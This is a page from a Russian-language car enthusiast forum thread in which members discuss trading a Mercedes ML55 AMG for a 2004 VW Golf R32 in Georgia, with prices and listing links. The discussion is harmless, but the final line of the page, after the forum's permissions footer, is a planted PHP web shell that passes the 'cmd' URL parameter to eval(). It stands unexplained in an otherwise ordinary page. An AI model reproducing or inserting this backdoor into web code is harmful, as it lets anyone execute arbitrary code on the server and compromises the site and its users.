+ Ответить в теме
Страница 1 из 6 1 2 3 ... ПоследняяПоследняя
Показано с 1 по 10 из 60

Тема: VW Golf R32 2004


  1. #1
    Meko
    Guest Аватар для Meko

    VW Golf R32 2004

    http://myauto.ge/car_details.php?car_id=1743484


    Всем привет...

    Ранее ездил на разных авто, от БМВ ушел из за постоянных поломок, с ТТ225 пересел на МЛ55 из за не практичности ТТ... но время проходит , и уже понимаю что МЛ не моё... Правда, не мучает вообще, по ремонту прост и дешевле чем ТТ не смотря на то что это АМГ...Но,,,ни управления, ни какого то ощущения от вождения...Тормоза слабые, автомат хоть и очень четкий, но все равно не ручка....Вот и подумал о R32, с турбаком вечно гемор из за бесконечного тюнинга и из за отсутсвия сервиса....На ТТ уже полтора года на 4-й скорости буст как поднимается на 1.3 сразу стравливает на 0.6 бар,,чего только не меняли, ничего не помогло..Вот и плюнул на турбак, атмосферник хочу...

    Вот только к вам с вопросом с надеждой на помощь... когда с ТТ пересел на МЛ, радовался, но очень быстро понял что ошибся... не разочаруюсь ли я пересев на R32 2004 года...по цене выходит одинаково, при чем если я продам МЛ удачно и куплю R32 тоже по дешевле...Сейчас на авто MB ML55 AMG 2001 , немец, пробег 90К

  2. #2
    GTI-Racing VVZ will become famous soon enough Аватар для VVZ
    Регистрация
    07.05.2008
    Машина
    VW Golf GTI Mk5 DSG
    Сообщений
    3,440
    Если бы я брал R32, то в пятом кузове. Он и рулится получше, т.к. сзади стоит независимая подвеска, а не примитивная балка. Так же он побольше будет, ну и в целом он значительно современнее. С трудом представляю, как после МЛ55 можно пересесть в R32 04 года... Если конечно человек не фанат Г4. Я не фанат.
    С уважением, Василий.

    My onboard video.

  3. #3
    GTI-Racing daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough Аватар для daToxa
    Регистрация
    22.04.2009
    Откуда
    Tiflis
    Машина
    Audi S3 1.8T
    Сообщений
    739
    Meko, знаю я этот R32, он приезжал на встречу клуба в Тбилиси, хозяина Рома зовут, этот гольф - японец, в нем не 240, а 260 сил вроде бы, очень ухоженный! ни единой царапки, пробег тож офигенно маленький, если б у меня были 15000 баксов, я бы взял незамедлительно, но к сожалению их нет :(

    З.Ы. Есть у нас в клубе пацан, у него МЛ, не АМГ но тож ничего, так от, он го продает и собирается купить ФВ Пассат или Ауди А4, в далеко не самом новом кузове, потому что ему нравится, я думаю что Г4 32 не разочрует :) Если нужно будет свсти с Ромой вживую, нет проблем, устроим встречу :)
    При ускорении слезы восхищения должны стекать горизонтально в направлении ушей (c)Вальтер Рерль
    Перед торможением двигателем сначала происходит торможение бампером, затем - облицовкой радиатора, радиатором и только после этого - двигателем...

  4. #4
    GTI-Racing Andrey777 is on a distinguished road Аватар для Andrey777
    Регистрация
    09.12.2008
    Откуда
    город на вольной Невой
    Машина
    GOLF IV GTI, AUM, 2001
    Сообщений
    56
    Цитата Сообщение от VVZ Посмотреть сообщение
    С трудом представляю, как после МЛ55 можно пересесть в R32 04 года....
    Да уж....конечно, разочарует в плане удобства и комфорта, размеров, проходимости. Наверное, только в плане быстрой езды будет ничего так, хотя амг55...Странный вообщем, переход, если только он не обусловлен чем-то, чего мы не знаем...
    С Уважением, Андрей.

  5. #5
    GTI-Racing daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough Аватар для daToxa
    Регистрация
    22.04.2009
    Откуда
    Tiflis
    Машина
    Audi S3 1.8T
    Сообщений
    739
    Вот лично мне МЛ не нравится, пусть и 55 АМГ, и Х5 не нравится, лучше Р32, по мне так лучше :)
    При ускорении слезы восхищения должны стекать горизонтально в направлении ушей (c)Вальтер Рерль
    Перед торможением двигателем сначала происходит торможение бампером, затем - облицовкой радиатора, радиатором и только после этого - двигателем...

  6. #6
    Meko
    Guest Аватар для Meko
    Цитата Сообщение от daToxa Посмотреть сообщение
    Meko, знаю я этот R32, он приезжал на встречу клуба в Тбилиси, хозяина Рома зовут, этот гольф - японец, в нем не 240, а 260 сил вроде бы, очень ухоженный! ни единой царапки, пробег тож офигенно маленький, если б у меня были 15000 баксов, я бы взял незамедлительно, но к сожалению их нет :(

    З.Ы. Есть у нас в клубе пацан, у него МЛ, не АМГ но тож ничего, так от, он го продает и собирается купить ФВ Пассат или Ауди А4, в далеко не самом новом кузове, потому что ему нравится, я думаю что Г4 32 не разочрует :) Если нужно будет свсти с Ромой вживую, нет проблем, устроим встречу :)
    хорошая вещь интернет:) daToxa меня Мехти зовут, в простонародье Меко...в Тбилиси бываю часто, ну дай Бог увидемся.... Парень мне сказал 14К, только есть одно но, на таможню еще 8К...итого 22 К... ну и МЛ в хорошем случае продам за эту цену:( а R32 я уже никогда не продам, ну если не решусь отдать за 10К..Это все сознательно понимаю...У меня уже был ТТ 225лс+чип тюнинг...

    Начально, МЛ новый стоил 130К евро, а Гольфок 35К максимум..Просто мне ВАГ нравится, уважаю этот концерн, правда шкода и сеат ваше не признаю....БЫл бы ТТ 225 лс кабрик или Honda S2000 с удовольствием взялбы....Случайком нет знакомых, которые продают S2000? только не тот что с номером HON 200

    Добавлено через 2 минуты
    Кстати, вот мой МЛ
    Последний раз редактировалось Meko; 16.08.2010 в 15:16. Причина: Добавлено сообщение

  7. #7
    GTI-Racing daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough Аватар для daToxa
    Регистрация
    22.04.2009
    Откуда
    Tiflis
    Машина
    Audi S3 1.8T
    Сообщений
    739
    Оч приятно, ежели в Тбилиси соберешься, надо будет еще и на встречу клуба попсать ;)

    14000, видимо народ не особо хочет покупать Гольф за такую цену, но так, для инфы, за 13000-14000 можно взять 5й ГТИ в Грузии, из америки, пробег 90000-130000 км, в офигенном состоянии :) я бы взял, но нету :(

    http://www.myauto.ge/car_details.php?car_id=1690537

    http://www.myauto.ge/car_details.php?car_id=1690572
    При ускорении слезы восхищения должны стекать горизонтально в направлении ушей (c)Вальтер Рерль
    Перед торможением двигателем сначала происходит торможение бампером, затем - облицовкой радиатора, радиатором и только после этого - двигателем...

  8. #8
    Хоть в Грузию езжай жить))
    The day I've bought my GTI was the day I became alive. ©
    GTI не стареют, со временем они становятся быстрее, и ниже. ©

  9. #9
    GTI-Racing S@TURN will become famous soon enough Аватар для S@TURN
    Регистрация
    09.07.2006
    Откуда
    мск
    Машина
    vr6 color concept - sold, а4 2.5tdi куатро!-sold, EOS - недопережитиай.
    Сообщений
    3,787
    Чука плюсую)))
    NON LIMITUS HOMICUS DOLBOEBICUS
    (нет предела человеческой глупости)

  10. #10
    GTI-Racing TishONE is on a distinguished road Аватар для TishONE
    Регистрация
    20.07.2008
    Откуда
    MSK
    Машина
    vRS FL 2011 (Race Blue)
    Сообщений
    1,139
    Сатурн удваиваю!)))
    MK2 GTI EV - ПРОДАНА.
    Hyundai Sonata 2.0 - ПРОДАНА.
    MK4 GTI AUM - ПРОДАНА.
    Skoda Octavia vRS - ПРОДАНА.
    BMW 116i - ПРОДАНА.
    Land Rover Discovery 4 HSE - комфорт превыше всего)

+ Ответить в теме
Страница 1 из 6 1 2 3 ... ПоследняяПоследняя

Похожие темы

  1. Продам GOLF 4 R32 2004 г.в.
    от Shystrui в разделе Покупка и продажа авто
    Ответов: 59
    Последнее сообщение: 13.11.2014, 20:11
  2. X5 e53 2004 3.0I
    от DusyAgregat в разделе Покупка и продажа авто
    Ответов: 6
    Последнее сообщение: 03.07.2014, 09:32
  3. Volkswagen Golf IV R32 2004
    от Shystrui в разделе Покупка и продажа авто
    Ответов: 25
    Последнее сообщение: 04.02.2014, 13:18
  4. Volkswagen Golf IV 2004
    от stay_true в разделе Покупка и продажа авто
    Ответов: 3
    Последнее сообщение: 30.10.2013, 23:43
  5. AUDI A4 2004
    от k0sm0s99 в разделе Покупка и продажа авто
    Ответов: 0
    Последнее сообщение: 13.07.2011, 17:42

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}